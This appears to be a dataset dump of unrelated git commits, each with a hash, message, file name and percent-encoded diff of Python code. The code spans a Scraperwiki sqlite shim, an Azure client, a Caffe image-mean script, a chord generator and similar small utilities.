assert_equals(urlparse.urljoin(base_uri, 'fdp'), g.fdpURI())%0A%0A%0Adef test_catalog_uri():%0A assert_equals(urlparse.urljoin(base_uri, 'catalog/catalog-01'), g.catURI('catalog-01'))%0A%0A%0Adef test_dataset_uri():%0A assert_equals(urlparse.urljoin(base_uri, 'dataset/breedb'), g.datURI('breedb'))%0A%0A%0Adef test_distribution_uri():%0A assert_equals(urlparse.urljoin(base_uri, 'distribution/breedb-sqldump'), g.distURI('breedb-sqldump'))%0A%0A
19c94f3bf71c07763dfddd72b867502d765d01db
Add https://gist.github.com/2349756
sqlite.py
sqlite.py
Python
0.000461
@@ -0,0 +1,1135 @@ +import scraperwiki%0Afrom dumptruck import DumpTruck%0A%0Adt = DumpTruck()%0A%0Adef execute(sqlquery, data=None, verbose=1):%0A %22%22%22 Should return list of lists, but returns list of dicts %22%22%22%0A return dt.execute(sqlquery, *data, commit=False)%0A # other way %5B dict(zip(result%5B%22keys%22%5D, d)) for d in result%5B%22data%22%5D %5D%0A%0Adef save(unique_keys, data, table_name=%22swdata%22, verbose=2, date=None):%0A dt.create_table(data, table_name = table_name)%0A #dt.add_index(unique_keys)%0A return dt.insert(data, table_name = table_name)%0A %0Adef attach(name, asname=None, verbose=1):%0A %22This somehow connects to scraperwiki.%22%0A raise NotImplementedError%0A%0Adef commit(verbose=1):%0A dt.commit()%0A%0Adef select(sqlquery, data=None, verbose=1):%0A sqlquery = %22select %25s%22 %25 sqlquery # maybe check if select or another command is there already?%0A return dt.execute(sqlquery, *data, commit = False)%0A%0Adef show_tables(dbname=%22%22):%0A return dt.tables()%0A%0Adef save_var(name, value, verbose=2):%0A return dt.save_var(name, value)%0A%0Adef get_var(name, default=None, verbose=2):%0A try:%0A return dt.get_var(name)%0A except NameError:%0A return default%0A
07e074e662b33713a266777300354e8953ce3b78
ADD connection class to Azure
plugin/connection.py
plugin/connection.py
Python
0.000001
@@ -0,0 +1,910 @@ +from plugin import utils%0Afrom azure import servicemanagement%0A%0Aclass AzureConnectionClient():%0A %22%22%22Provides functions for getting the Azure Service Management Service%0A %22%22%22%0A%0A def __init__(self):%0A self.connection = None%0A%0A def client(self):%0A %22%22%22Represents the AzureConnection Client%0A %22%22%22%0A%0A azure_subscription = self._get_azure_subscription()%0A azure_certificate = self._get_azure_certificate()%0A%0A return ServiceManagementService(azure_subscription, %0A azure_certificate)%0A %0A def _get_azure_subscription(self):%0A node_properties = %5C%0A utils.get_instance_or_source_node_properties()%0A return node_properties%5B%22subscription%22%5D%0A %0A def _get_azure_certificate(self):%0A node_properties = %5C%0A utils.get_instance_or_source_node_properties()%0A return node_properties%5B%22certificate%22%5D%0A
9ceb4f394c19a74d8cd28698eeb9116cf8099117
add anno
annot_to_densitymap.py
annot_to_densitymap.py
Python
0.999998
@@ -0,0 +1,746 @@ +import xml.etree.ElementTree as ET%0Aimport numpy as np%0Aimport xmltodict%0Aimport matplotlib.pyplot as plt%0A#import cv2%0A%0Axml_data = 'data/Cam253/%5BCam253%5D-2016_4_21_15h_150f/000150.xml'%0A%0Awith open(xml_data) as xml_d:%0A%09doc = xmltodict.parse(xml_d.read())%0A%0Aimg = np.zeros((352, 240), np.float32)%0A%0Adef add_to_image(image, bbox):%0A%09xmin = int(bbox%5B'xmin'%5D)%0A%09ymin = int(bbox%5B'ymin'%5D)%0A%09xmax = int(bbox%5B'xmax'%5D)%0A%09ymax = int(bbox%5B'ymax'%5D)%0A%09density = 1/ float((ymax - ymin) * (xmax - xmin))%09%0A%0A%09image%5Bxmin:xmax, ymin:ymax%5D += density%0A%09print(np.sum(image))%0A%09print(xmin)%0A%09print(xmax)%0A%09print(ymin)%0A%09print(ymax)%0A%09return image%0A%0Afor vehicle in doc%5B'annotation'%5D%5B'vehicle'%5D:%0A%09add_to_image(img, vehicle%5B'bndbox'%5D)%0A%0Aimgplot = plt.imshow(img)%0Aplt.show()%0Aprint(np.sum(img))%0A
0b0150ad73c52ea5b23def899edb819bd3318eb1
fix uncaught analytics exception
lbrynet/analytics/api.py
lbrynet/analytics/api.py
import functools import json import logging from requests import auth from requests_futures import sessions from lbrynet.conf import settings from lbrynet.analytics import utils log = logging.getLogger(__name__) def log_response(fn): def _log(future): if future.cancelled(): log.warning('Request was unexpectedly cancelled') else: response = future.result() log.debug('Response (%s): %s', response.status_code, response.content) @functools.wraps(fn) def wrapper(*args, **kwargs): future = fn(*args, **kwargs) future.add_done_callback(_log) return future return wrapper class Api(object): def __init__(self, session, url, write_key): self.session = session self.url = url self.write_key = write_key @property def auth(self): return auth.HTTPBasicAuth(self.write_key, '') @log_response def batch(self, events): """Send multiple events in one request. Each event needs to have its type specified. """ data = json.dumps({ 'batch': events, 'sentAt': utils.now(), }) log.debug('sending %s events', len(events)) log.debug('Data: %s', data) return self.session.post(self.url + '/batch', json=data, auth=self.auth) @log_response def track(self, event): """Send a single tracking event""" log.debug('Sending track event: %s', event) return self.session.post(self.url + '/track', json=event, auth=self.auth) @classmethod def new_instance(cls, session=None): """Initialize an instance using values from the configuration""" if not session: session = sessions.FuturesSession() return cls( session, settings.ANALYTICS_ENDPOINT, utils.deobfuscate(settings.ANALYTICS_TOKEN) )
Python
0.000009
@@ -348,16 +348,98 @@ elled')%0A + elif future.exception():%0A log.warning(future.exception_info())%0A
8088d7061c24ca78df0c92be6e36edb7deca1dac
Remove print
gargoyle/client/operators/__init__.py
gargoyle/client/operators/__init__.py
import inspect class GetInitArguments(object): def __get__(self, obj, obj_type): print obj_type args = inspect.getargspec(obj_type.__init__).args return tuple(args[1:]) class Base(object): def __init__(self): pass arguments = GetInitArguments()
Python
0.000016
@@ -89,35 +89,8 @@ e):%0A - print obj_type%0A
8238d7ad6793f6deef520a46f85d40b0d75d221f
Add placeholder for the parsing code
gpmf/parse.py
gpmf/parse.py
Python
0.000002
@@ -0,0 +1,112 @@ +# TODO: Implement GPMF parsing%0A# see https://github.com/gopro/gpmf-parser#gmfp-deeper-dive for format details%0A
d7553fd42e3ac0bcdf0ab70468ad314253b64871
Create parse.py
zoom/parse.py
zoom/parse.py
Python
0
@@ -0,0 +1,1433 @@ +parse(geo, df) :%0A latDict, lonDict = dict(), dict()%0A%0A # identify extreme most latitude and longitude coordinate pairs in each state%0A # save coordinate pair of most extreme points for autozoom%0A for count in range(0,len(usStates%5B'features'%5D)) :%0A if geo%5B'key'%5D in %5Bcode for code in statePctChange%5B'code'%5D%5D :%0A for coords in geo%5B'key'%5D%5B'coordinates'%5D%5B0%5D :%0A # collect lat, lon data in either geoJSON format%0A # lat, lon data will either be in list (coords) or a list of lists (pairs) %0A try :%0A latDict%5Bcoords%5B1%5D%5D = coords%0A lonDict%5Bcoords%5B0%5D%5D = coords%0A except :%0A for pair in coords :%0A latDict%5Bpair%5B1%5D%5D = pair%0A lonDict%5Bpair%5B0%5D%5D = pair%0A %0A bounds = %5Blist(reversed(l)) for l in %5BlatDict%5Bmax(%5Bkey for key in latDict.keys()%5D)%5D, latDict%5Bmin(%5Bkey for key in latDict.keys()%5D)%5D,%0A lonDict%5Bmax(%5Bkey for key in lonDict.keys()%5D)%5D, lonDict%5Bmin(%5Bkey for key in lonDict.keys()%5D)%5D%5D%5D%0A # keep most extreme bounds to save maximum bounding triangle%0A triangle = bounds.remove(min(%5Babs(max(%5Bkey for key in latDict.keys()%5D)), abs(min(%5Bkey for key in latDict.keys()%5D)), %0A abs(max(%5Bkey for key in lonDict.keys()%5D)), abs(min(%5Bkey for key in lonDict.keys()%5D))%5D))%0A%0A return bounds, triangle%0A
0f7d6f039930324d77dc23315ed3c9bd10c1f0de
Add missing file
util.py
util.py
Python
0.000006
@@ -0,0 +1,1530 @@ +#%0A# Copyright 2016 Anil Thomas%0A#%0A# Licensed under the Apache License, Version 2.0 (the %22License%22);%0A# you may not use this file except in compliance with the License.%0A# You may obtain a copy of the License at%0A#%0A# http://www.apache.org/licenses/LICENSE-2.0%0A#%0A# Unless required by applicable law or agreed to in writing, software%0A# distributed under the License is distributed on an %22AS IS%22 BASIS,%0A# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.%0A# See the License for the specific language governing permissions and%0A# limitations under the License.%0A#%0A%22%22%22%0AUtility functions.%0A%22%22%22%0Aimport numpy as np%0Afrom sklearn import metrics%0Afrom prep import nwin%0A%0A%0Adef avg(labels, preds):%0A assert preds.shape%5B0%5D %25 nwin == 0%0A preds_len = preds.shape%5B0%5D // nwin%0A post_preds = np.zeros(preds_len, np.float32)%0A post_labels = np.zeros(preds_len, np.float32)%0A for i in range(preds_len):%0A post_preds%5Bi%5D = np.mean(preds%5Bnwin*i:nwin*(i+1)%5D)%0A post_labels%5Bi%5D = labels%5Bnwin*i%5D%0A assert post_labels%5Bi%5D == np.mean(labels%5Bnwin*i:nwin*(i+1)%5D)%0A return (post_labels, post_preds)%0A%0A%0Adef avg_preds(preds):%0A assert preds.shape%5B0%5D %25 nwin == 0%0A preds_len = preds.shape%5B0%5D // nwin%0A post_preds = np.zeros(preds_len, np.float32)%0A for i in range(preds_len):%0A post_preds%5Bi%5D = np.mean(preds%5Bnwin*i:nwin*(i+1)%5D)%0A return post_preds%0A%0A%0Adef auc(labels, preds):%0A return metrics.roc_auc_score(labels, preds)%0A%0A%0Adef score(labels, preds):%0A return auc(*avg(labels, preds))%0A
37dabf1c98407602edda25dbb9c24c17bd84f19a
Add timer to builders
dev/scripts/coolprop_builder_timer.py
dev/scripts/coolprop_builder_timer.py
Python
0
@@ -0,0 +1,502 @@ +from __future__ import print_function%0A%0Aimport urllib, json%0Afilehandle = urllib.urlopen('http://www.coolprop.dreamhosters.com:8010/json/builders')%0Ajj = json.loads(filehandle.read())%0A%0Atimes = %5B%5D%0Afor key in jj.keys():%0A filehandle = urllib.urlopen('http://www.coolprop.dreamhosters.com:8010/json/builders/' + key + '/builds/-1')%0A builder = json.loads(filehandle.read())%0A elapsed_time = builder%5B'times'%5D%5B1%5D - builder%5B'times'%5D%5B0%5D%0A times.append((elapsed_time, key))%0A %0Aprint(sorted(times)%5B::-1%5D)
b37eae02a69759352652514635616b9bb504b21b
rewritten as a function
ex33-1.py
ex33-1.py
Python
0.999441
@@ -0,0 +1,727 @@ +def append_wrapper(n):%0A%09'''Append the natural numbers up to n to a list and print the last element at the beginning and%0A%09end of each iteration. Then print the list%0A%09n -- the upper bound%0A%09'''%0A%09i=0%0A%09numbers = %5B%5D%0A%0A%09while i%3Cn:%0A%09%09#where we are at the beginning of the iteration%0A%09%09print %22At the top i is %25d%22 %25 i%0A%0A%09%09numbers.append(i)%0A%0A%09%09#if we don't increment the loop will go on forever or until the OS stops it.%0A%09%09i = i + 1%0A%09%09print %22Numbers now: %22, numbers%0A%09%09#now look!%0A%09%09print %22At the bottom i is %25d%22 %25 i%0A%0A%09%09print %22The numbers: %22%0A%0A%09%09for num in numbers:%0A%09%09%09print num%0A%0Ainput_num = input(%22Count up to WHAT?!%22)%0Aif isinstance(input_num, int):%0A%09append_wrapper(input_num)%0Aelse:%0A%09print %22Counting numbers only. This program will exit now.%22%0A
45aacb9d0f5f24600d4796cc5194dfbde1c65222
Add map/dist/filter demo
learning-python/ch05/MapExamples.py
learning-python/ch05/MapExamples.py
Python
0
@@ -0,0 +1,919 @@ +lst = range(10)%0A%0Aret = map(lambda *i: i, lst, %22abcdefg%22)%0A%0Afor item in ret:%0A print(item)%0A%0Astudents = %5B%0A dict(id=0, credits=dict(math=9, physics=6, history=7)),%0A dict(id=1, credits=dict(math=6, physics=7, latin=10)),%0A dict(id=2, credits=dict(history=8, physics=9, chemistry=10)),%0A dict(id=3, credits=dict(math=5, physics=5, geography=7)),%0A%5D%0A%0Aprint(type(students%5B0%5D%5B%22credits%22%5D.values()))%0A%0Adef decorate(student):%0A return (sum(student%5B'credits'%5D.values()), student)%0A%0Adef undecorate(decorated_student):%0A return decorated_student%5B1%5D%0A%0Astudents = sorted(map(decorate, students), reverse=True)%0A%0Afor s in students:%0A print(s)%0A%0Astudents = list(map(undecorate, students))%0A%0Afor s in students:%0A print(s)%0A%0A%0Aa = %5B3, 6, 9%5D%0Ab = %5B4, 7, 10%5D%0Ac = %5B1, 8, 2%5D%0A%0Ar = map(lambda n: max(*n), zip(a, b, c))%0Afor item in r:%0A print(item)%0A%0Ad = %5B0, 1, 2, 3, 4%5D%0Aret = filter(lambda n: n %3E 2, d)%0Afor item in ret:%0A print(item)
efcc5260a8566d41880cddcc54d4f86c8f722153
Add unit test
test/unit_test/test_utility_stats/test_utility_stats.py
test/unit_test/test_utility_stats/test_utility_stats.py
Python
0.000001
@@ -0,0 +1,436 @@ +from lexos.processors.analyze import information%0A%0Aword_lists = %5B%7B%22abundant%22: 40, %22actually%22: 20, %22advanced%22: 15, %22alter%22: 5%7D,%0A %7B%22hunger%22: 1, %22hunt%22: 2, %22ignore%22: 3, %22illustration%22: 4,%0A %22ink%22: 5%7D%5D%0A%0Afile_list = %5B%22file_one.txt%22, %22file_two.txt%22%5D%0A%0Afor i in range(len(file_list)):%0A # because the first row of the first line is the ''%0A file_information = information.FileInformation(word_lists%5Bi%5D, file_list)%0A%0A
7dc489b393ba293db5cc72c2f9b2bd65d6fe1166
add command to migrate sheet.
upload/management/commands/import_transaction.py
upload/management/commands/import_transaction.py
Python
0
@@ -0,0 +1,928 @@ +import csv%0Afrom django.contrib.auth.models import User%0Afrom opencivicdata.models import Jurisdiction, Division%0Afrom upload.backend.parser import import_stream, people_to_pupa%0Afrom upload.backend.importer import do_import%0Afrom upload.models import SpreadsheetUpload%0A%0Afrom django.core.management.base import BaseCommand, CommandError%0A%0A%0Aclass Command(BaseCommand):%0A args = '%3Ctransaction%3E %3Cuser%3E'%0A help = 'Import a Sheet'%0A%0A def import_transaction(self, transaction_id, username):%0A user = User.objects.get(username=username)%0A transaction = SpreadsheetUpload.objects.get(id=transaction_id)%0A%0A assert transaction.approved_by is None%0A%0A stream = people_to_pupa(transaction.people.all(), transaction)%0A report = do_import(stream, transaction)%0A transaction.approved_by = user%0A transaction.save()%0A%0A def handle(self, *args, **options):%0A return self.import_transaction(*args)%0A
35a0832ab372b9519ed7391e166ef8c25456a005
Bump minor version
pygerduty/version.py
pygerduty/version.py
version_info = (0, 28, 1) __version__ = '.'.join(str(v) for v in version_info)
Python
0
@@ -20,9 +20,9 @@ 28, -1 +2 )%0A__
b9245a8acf0bed7e19f709490c4ba3788028da93
Fix error in PoolStatusEntry model
server/ec2spotmanager/migrations/0003_auto_20150504_1440.py
server/ec2spotmanager/migrations/0003_auto_20150504_1440.py
Python
0.000001
@@ -0,0 +1,612 @@ +# -*- coding: utf-8 -*-%0Afrom __future__ import unicode_literals%0A%0Afrom django.db import models, migrations%0A%0A%0Aclass Migration(migrations.Migration):%0A%0A dependencies = %5B%0A ('ec2spotmanager', '0002_instancestatusentry_poolstatusentry'),%0A %5D%0A%0A operations = %5B%0A migrations.RemoveField(%0A model_name='poolstatusentry',%0A name='instance',%0A ),%0A migrations.AddField(%0A model_name='poolstatusentry',%0A name='pool',%0A field=models.ForeignKey(default=0, to='ec2spotmanager.InstancePool'),%0A preserve_default=False,%0A ),%0A %5D%0A
d05bdc1a3a343184a02ec12b734a110140e94829
add persistent decorator of class
server/Mars/ServerUtils/PersistentDecorator.py
server/Mars/ServerUtils/PersistentDecorator.py
Python
0.000001
@@ -0,0 +1,1460 @@ +#!/usr/bin/env python%0A# -*- encoding: utf-8 -*-%0A#%0A# Copyright (c) 2016 ASMlover. All rights reserved.%0A#%0A# Redistribution and use in source and binary forms, with or without%0A# modification, are permitted provided that the following conditions%0A# are met:%0A#%0A# * Redistributions of source code must retain the above copyright%0A# notice, this list ofconditions and the following disclaimer.%0A#%0A# * Redistributions in binary form must reproduce the above copyright%0A# notice, this list of conditions and the following disclaimer in%0A# the documentation and/or other materialsprovided with the%0A# distribution.%0A#%0A# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS%0A# %22AS IS%22 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT%0A# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS%0A# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE%0A# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,%0A# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,%0A# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;%0A# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER%0A# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT%0A# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN%0A# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE%0A# POSSIBILITY OF SUCH DAMAGE.%0A%0Adef persistent(cls):%0A cls.isPersistent = True%0A return cls%0A
ee21691294e6bf9aacf0dd8591991c33d30c5159
raise KeyboardInterrupt for backward compatibility
pysnmp/carrier/asyncore/dispatch.py
pysnmp/carrier/asyncore/dispatch.py
# Implements I/O over asynchronous sockets from time import time from sys import exc_info from asyncore import socket_map from asyncore import loop from pysnmp.carrier.base import AbstractTransportDispatcher from pysnmp.error import PySnmpError class AsynsockDispatcher(AbstractTransportDispatcher): def __init__(self): self.__sockMap = {} # use own map for MT safety self.timeout = 0.5 AbstractTransportDispatcher.__init__(self) def getSocketMap(self): return self.__sockMap def setSocketMap(self, sockMap=socket_map): self.__sockMap = sockMap def registerTransport(self, tDomain, t): AbstractTransportDispatcher.registerTransport(self, tDomain, t) t.registerSocket(self.__sockMap) def unregisterTransport(self, tDomain): self.getTransport(tDomain).unregisterSocket(self.__sockMap) AbstractTransportDispatcher.unregisterTransport(self, tDomain) def transportsAreWorking(self): for transport in self.__sockMap.values(): if transport.writable(): return 1 return 0 def runDispatcher(self, timeout=0.0): while self.jobsArePending() or self.transportsAreWorking(): try: loop(timeout and timeout or self.timeout, use_poll=True, map=self.__sockMap, count=1) except: raise PySnmpError('poll error: %s' % exc_info()[1]) self.handleTimerTick(time())
Python
0.000001
@@ -1344,16 +1344,76 @@ ount=1)%0A + except KeyboardInterrupt:%0A raise%0A
98bd10cdf2c380b17c16a47a8f962dc384b3a18d
Solve py set discard remove pop
python/py-set-discard-remove-pop.py
python/py-set-discard-remove-pop.py
Python
0.999979
@@ -0,0 +1,288 @@ +num_elements = int(input())%0As = set(map(int, input().split()))%0Anum_operations = int(input())%0Afor _ in range(num_operations):%0A operation = input().split(%22 %22)%0A if(operation%5B0%5D == %22pop%22):%0A s.pop()%0A else:%0A op, val = operation%0A s.discard(int(val))%0A%0Aprint(sum(s))%0A
a8db812c5a9822f6ea72bf44134ed2219a2c5c74
Remove print statement.
app/main/views/dashboard.py
app/main/views/dashboard.py
from flask import (abort, render_template, session) from flask_login import login_required from app.main import main from app.main.dao.services_dao import get_service_by_id from app.main.dao import templates_dao from notifications_python_client.errors import HTTPError from app import job_api_client from app.utils import user_has_permissions @main.route("/services/<service_id>/dashboard") @login_required def service_dashboard(service_id): try: templates = templates_dao.get_service_templates(service_id)['data'] jobs = job_api_client.get_job(service_id)['data'] except HTTPError as e: if e.status_code == 404: abort(404) else: raise e try: service = get_service_by_id(service_id) session['service_name'] = service['data']['name'] print(service['data']['id']) session['service_id'] = service['data']['id'] except HTTPError as e: if e.status_code == 404: abort(404) else: raise e return render_template( 'views/service_dashboard.html', jobs=list(reversed(jobs))[:5], more_jobs_to_show=(len(jobs) > 5), free_text_messages_remaining='250,000', spent_this_month='0.00', template_count=len(templates), service_id=str(service_id))
Python
0.000046
@@ -817,45 +817,8 @@ e'%5D%0A - print(service%5B'data'%5D%5B'id'%5D)%0A
f3130bde2704008017e1438bf7d6cb1c0bbf3d61
Create jsonSender.py
jsonSender.py
jsonSender.py
Python
0.000048
@@ -0,0 +1,706 @@ +import socket%0Aimport json%0Aimport time%0Afrom distancemeter import get_distance,cleanup%0A%0A# Logstash TCP/JSON Host%0AJSON_PORT = 5959%0AJSON_HOST = '127.0.0.1'%0A%0Aif __name__ == '__main__':%0A try:%0A s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)%0A s.connect((JSON_HOST, JSON_PORT))%0A%0A while True:%0A distance = get_distance()%0A data = %7B'message': 'distance %25.1f cm' %25 distance, 'distance': distance, 'hostname': socket.gethostname()%7D%0A%0A s.send(json.dumps(data))%0A s.send('%5Cn')%0A print (%22Received distance = %25.1f cm%22 %25 distance)%0A time.sleep(0.2)%0A%0A # interrupt%0A except KeyboardInterrupt:%0A print(%22Program interrupted%22)%0A
482c79850a943f77034d376c0d8e8682142b705d
Add init
project_management/pmtools/__init__.py
project_management/pmtools/__init__.py
Python
0.085164
@@ -0,0 +1,736 @@ +%22%22%22%0APipeline Management Tools%0A%0AUsage: pm command %5Boptions%5D%0A%22%22%22%0A%0Afrom cement.core import foundation, controller, handler%0A%0A## Abstract base controller -- for sharing arguments%0Aclass AbstractBaseController(controller.CementBaseController):%0A class Meta:%0A arguments = %5B%0A (%5B'-n', '--dry_run'%5D, dict(help=%22dry_run - don't actually do anything%22)),%0A %5D%0A%0A def _setup(self, base_app):%0A super(AbstractBaseController, self)._setup(base_app)%0A self.shared_config = dict()%0A%0A%0A## Main pm base controller%0Aclass PmController(controller.CementBaseController):%0A class Meta:%0A label = 'pm'%0A description = ''%0A%0A @controller.expose(hide=True)%0A def default(self):%0A print dir(self)%0A%0A%0A%0A%0A%0A
d853fba90a8fc784cdb248923cede6166fe91a8f
remove some field that duplicate
netforce_mfg/netforce_mfg/models/stock_barcode.py
netforce_mfg/netforce_mfg/models/stock_barcode.py
# Copyright (c) 2012-2015 Netforce Co. Ltd. # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in all # copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, # EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF # MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. # IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, # DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR # OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE # OR OTHER DEALINGS IN THE SOFTWARE. from netforce.model import Model, fields, get_model class Barcode(Model): _inhierit= "stock.barcode" _transient = True _fields = { "type": fields.Selection([["in", "Goods Receipt"], ["internal", "Goods Transfer"], ["out", "Goods Issue"]], "Transaction Type"), "related_id": fields.Reference([["sale.order", "Sales Order"], ["purchase.order", "Purchase Order"], ["production.order", "Production Order"], ["stock.picking", "Picking"]], "Related To"), } def onchange_related(self, context={}): data = context["data"] type = data["type"] val = data["related_id"][0] relation, rel_id = val.split(",") rel_id = int(rel_id) if relation == "production.order": rel = get_model("production.order").browse(rel_id) if type == "out": data["location_to_id"] = rel.production_location_id.id elif type == "in": data["location_from_id"] = rel.production_location_id.id return data Barcode.register()
Python
0.000004
@@ -1206,182 +1206,24 @@ de%22%0A - _transient = True%0A _fields = %7B%0A %22type%22: fields.Selection(%5B%5B%22in%22, %22Goods Receipt%22%5D, %5B%22internal%22, %22Goods Transfer%22%5D, %5B%22out%22, %22Goods Issue%22%5D%5D, %22Transaction Type%22), +%0A _fields = %7B %0A
f1e2ae06784d759b0f6dbfae1424a2de70353ea9
add a module used to call platon (software assigning space groups) on a structure in pymatgen
pymatgen/command_line/platon_caller.py
pymatgen/command_line/platon_caller.py
Python
0
@@ -0,0 +1,1589 @@ +'''%0AInterface with command line platon%0Ahttp://aflowlib.org/%0AOnly tested on Linux%0Ainspired by Shyue's qhull_caller%0AWARNING: you need to have a platon in your path for this to work%0A'''%0A%0A__author__=%22Geoffroy Hautier%22%0A__copyright__ = %22Copyright 2012, The Materials Project%22%0A__version__ = %221.0%22%0A__maintainer__ = %22Geoffroy Hautier%22%0A__email__ = %22geoffroy.hautier@uclouvain.be%22%0A__status__ = %22Production%22%0A__date__ =%22$February 24, 2012M$%22%0A%0Aimport subprocess%0Aimport pymatgen.io.cifio%0Aimport os%0A%0A%0Adef run_platon_command(command, structure):%0A %22%22%22%0A Helper function for calling platon with different arguments%0A I know it's uggly to actually write a file and call platon but I did not manage to make it work in another way%0A %22%22%22%0A writer=pymatgen.io.cifio.CifWriter(structure)%0A #incommand=str(writer)%0A #print incommand%0A writer.write_file(%22/tmp/tmp.cif%22)%0A command.append(%22/tmp/tmp.cif%22)%0A p = subprocess.Popen(command,shell = False, stdout = subprocess.PIPE, stdin = subprocess.PIPE)%0A output = p.communicate()%0A os.remove(%22/tmp/tmp.cif%22)%0A return output%0A%0Adef get_space_group(structure):%0A output=run_platon_command(%5B'platon', '-o', '-c'%5D, structure)%0A dictio=%7B%7D%0A for line in output%5B0%5D.split(%22%5Cn%22):%0A # print line%0A if(line.find(%22Space Group%22)!=-1):%0A list_tmp=line.split()%0A # print list_tmp%0A for i in range(len(list_tmp)):%0A if(list_tmp%5Bi%5D=='Group'):%0A dictio%5B'SG_HM'%5D=list_tmp%5Bi+1%5D%0A if(list_tmp%5Bi%5D=='No:'):%0A dictio%5B'SG_NB'%5D=list_tmp%5Bi+1%5D%0A return dictio%0A
6cad2d60857e9d8714f679f68ae4887e58092a57
Add caffe-compute-image-mean.
python2.7/caffe-compute-image-mean.py
python2.7/caffe-compute-image-mean.py
Python
0.000002
@@ -0,0 +1,1795 @@ +#!/usr/bin/env python2%0A%0Aimport sys%0Asys.path.append(%22/home/bamos/repos/caffe-local/python%22)%0A%0Aimport argparse%0Aimport numpy as np%0Aimport os%0Aimport time%0A%0Afrom caffe.proto import caffe_pb2%0Afrom caffe.io import array_to_blobproto%0Afrom collections import defaultdict%0Afrom skimage import io%0A%0Aif __name__ == '__main__':%0A parser = argparse.ArgumentParser()%0A parser.add_argument('meanPrefix', type=str, help=%22TODO%22)%0A parser.add_argument('imageDir', type=str, help=%22TODO%22)%0A args = parser.parse_args()%0A%0A exts = %5B%22jpg%22, %22png%22%5D%0A%0A mean = np.zeros((1, 3, 152, 152))%0A N = 0%0A classSizes = defaultdict(int)%0A%0A beginTime = time.time()%0A for subdir, dirs, files in os.walk(args.imageDir):%0A for fName in files:%0A (imageClass, imageName) = (os.path.basename(subdir), fName)%0A if any(imageName.lower().endswith(%22.%22 + ext) for ext in exts):%0A img = io.imread(os.path.join(subdir, fName))%0A if img.shape == (152, 152, 3):%0A mean%5B0%5D%5B0%5D += img%5B:,:,0%5D%0A mean%5B0%5D%5B1%5D += img%5B:,:,1%5D%0A mean%5B0%5D%5B2%5D += img%5B:,:,2%5D%0A N += 1%0A if N %25 1000 == 0:%0A elapsed = time.time() - beginTime%0A print(%22Processed %7B%7D images in %7B:.2f%7D seconds. %22%0A %22%7B:.2f%7D images/second.%22.format(N, elapsed,%0A N/elapsed))%0A mean%5B0%5D /= N%0A%0A blob = array_to_blobproto(mean)%0A with open(%22%7B%7D.binaryproto%22.format(args.meanPrefix), 'wb') as f:%0A f.write(blob.SerializeToString())%0A np.save(%22%7B%7D.npy%22.format(args.meanPrefix), mean%5B0%5D)%0A%0A meanImg = np.transpose(mean%5B0%5D.astype(np.uint8), (1, 2, 0))%0A io.imsave(%22%7B%7D.png%22.format(args.meanPrefix), meanImg)%0A
8e94da2cf788115a1562db253c96b1932b495ef3
Add script for generating chords, used to make some of the sounds.
make_chord.py
make_chord.py
Python
0
@@ -0,0 +1,986 @@ +from collections import OrderedDict%0Afrom itertools import cycle%0Aimport sys%0A%0A# build the pitch table%0Anote_names = %5B'A', 'A#/Bb', 'B', 'C', 'C#/Db', 'D', 'D#/Eb', 'E', 'F', 'F#/Gb', 'G', 'G#/Ab'%5D%0Anote_cycle = cycle(note_names)%0A%0Apiano = %5B%5D%0Aonumber = 0%0Afor i in range(1, 89):%0A note = note_cycle.next()%0A%0A if note == 'C':%0A onumber += 1%0A%0A piano.append(%7B%0A 'number': i,%0A 'name': %5Bn + str(onumber) for n in note.split('/')%5D,%0A 'freq': (2 ** ((i - 49.0) / 12)) * 440%0A %7D)%0A%0A# invert it%0Afreqs = %7B%7D%0Afor key in piano:%0A for name in key%5B'name'%5D:%0A freqs%5Bname%5D = key%5B'freq'%5D%0A%0A# look at arguments for pitch names and build samples%0Afrom wavebender import *%0A%0Aflist = %5B%5D%0Arequested = sys.argv%5B1:%5D%0Aamp = 0.8 / len(requested)%0Afor arg in requested:%0A flist.append(sine_wave(freqs%5Barg%5D, amplitude=amp))%0A%0Achannels = (tuple(flist),)%0A%0Anframes = 44100 * 10%0A%0Asamples = compute_samples(channels, nframes)%0Awrite_wavefile(sys.stdout, samples, nchannels=1, nframes=nframes)
56bfc977ea1e7b415e699a82459c917c71fe36df
add app.utils module
app/utils.py
app/utils.py
Python
0.000002
@@ -0,0 +1,113 @@ +%0A%0Adef get_city_by_coordinates(lon, lat):%0A # TODO: determinate city (reverse geocoding...)%0A return %22MyCity%22%0A
2b1500419e97b75c7b5bda9d8e226ed8340edb50
add experimental python proxy
lotwreport.py
lotwreport.py
Python
0.000001
